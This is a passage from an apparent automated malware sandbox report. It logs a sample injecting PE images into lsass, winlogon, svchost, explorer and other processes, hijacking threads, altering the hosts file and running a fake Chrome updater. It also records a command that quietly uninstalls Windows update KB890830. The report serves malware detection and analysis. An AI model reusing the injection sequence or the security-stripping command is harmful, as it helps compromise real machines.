                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1B210E80000 protect: page execute and read and write
                      Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 28708E30000 protect: page execute and read and write
                      Contains functionality to inject code into remote processes
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,17_2_0000000140001C88
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 5895273CJump to behavior
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: ADFC273CJump to behavior
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: DD59273CJump to behavior
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 589B273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AE89273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DE1A273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CA6273C
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: E107273C
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 8C1D273C
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 97FD273C
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 652E273C
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: A27A273C
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 87DA273C
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: FB3C273C
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 567273C
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: C1F3273C
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: E3BC273C
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 3895273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6E56273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1FF7273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F35273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7957273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A46273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1311273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8C58273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5F1D273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D9C273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AEC9273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC1B273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8253273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EC273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 66EB273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FD9A273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CEDB273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4279273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B6F3273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8DCF273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7373273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA54273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6CCC273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 39D9273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA39273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B731273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 53B5273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E88A273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 77B5273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5D34273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B5E1273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5999273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 53C2273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 41D4273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ADAD273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 307273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4DB273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 87A273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C528273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 76AA273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F1B3273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F34B273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DE4D273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7447273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A9D0273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AF8E273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D893273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5E93273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 43DC273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 97E3273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DC87273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 698D273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F906273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 34C5273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4354273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8434273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5892273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 612273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4869273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AA0F273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EB87273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F8F8273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 826F273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7F9273C
                      Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 10E8273C
                      Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: 8E3273C
                      Injects a PE file into a foreign processes
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CA30000 value starts with: 4D5AJump to behavior
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140AE890000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DE1A0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CA60000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27A0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: EC0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCF0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBFA540000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7310000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 87A0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8E0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28AF9060000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26106120000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 19D48690000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1A4AA0F0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2BEEB870000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AEF8F80000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 25B826F0000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 12107F90000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1B210E80000 value starts with: 4D5A
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 28708E30000 value starts with: 4D5A
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\dialer.exeMemory written: PID: 1028 base: 87A0000 value: 4D
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\system64x.exeThread register set: target process: 3876Jump to behavior
                      Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 7672
                      Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 7728
                      Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 7780
                      Modifies the hosts file
                      Source: C:\Windows\SysWOW64\system64x.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000Jump to behavior
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000Jump to behavior
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000Jump to behavior
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CA30000Jump to behavior
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140AE890000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DE1A0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CA60000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27A0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: EC0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCF0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBFA540000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7310000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 87A0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34B0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74470000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8E0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F843DC0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28AF9060000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26106120000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 19D48690000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1A4AA0F0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2BEEB870000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AEF8F80000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 25B826F0000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 12107F90000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1B210E80000
                      Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 28708E30000
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeProcess created: C:\Windows\SysWOW64\system64x.exe "C:\Windows\SysWOW64\system64x.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\dialer.exe dialer.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,17_2_0000000140001B54
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,17_2_0000000140001B54
                      Source: winlogon.exe, 00000016.00000000.2408863317.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3606414486.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000021.00000002.3622373759.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
